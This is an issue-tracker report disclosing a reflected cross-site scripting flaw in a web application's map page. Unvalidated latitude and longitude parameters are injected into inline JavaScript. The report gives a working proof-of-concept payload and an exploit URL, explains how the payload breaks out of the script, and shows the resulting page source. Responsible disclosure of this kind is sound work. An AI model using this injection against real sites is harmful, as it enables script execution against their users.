latitude and longitude parameters are not validated correctly

Issue #374 new
Simon Waters created an issue

latitude and longitude parameters are not validated, and included directly in JavaScript, this appears to permit cross site scripting (XSS). The attack persists through login.

In the example below latitude is coded as '17828,1);};alert(1);/*'

This terminates the open bracket for the mapping function, then closes the open function definition, runs the alert (payload), and then uses "/*" to comment out the remaining dross.

http://192.168.56.101/app/index.php/maps/default/mapAndPoint?addressString=121b+Baker%27s+Street%2C+London%2C+SW1+1TB%2C+UK&latitude=17828,1%29;};alert%281%29;/*&longitude=

I appear to be able to inject pretty much anything into the JavaScript via these parameters.

Because it injects straight into JavaScript it isn't caught by the Chrome XSS auditor so reflected XSS worked in Firefox and Chrome.

Resulting web page.

<div id="ModalView"><div id="AddressMapModalView"><div id='map-canvasmodal' class="mapcanvas"></div></div></div><script type="text/javascript">
/*<![CDATA[*/

            function plotMap()
            {
                var latlng = new google.maps.LatLng(17828,1);};alert(1);/*, );

Comments (0)

  1. Log in to comment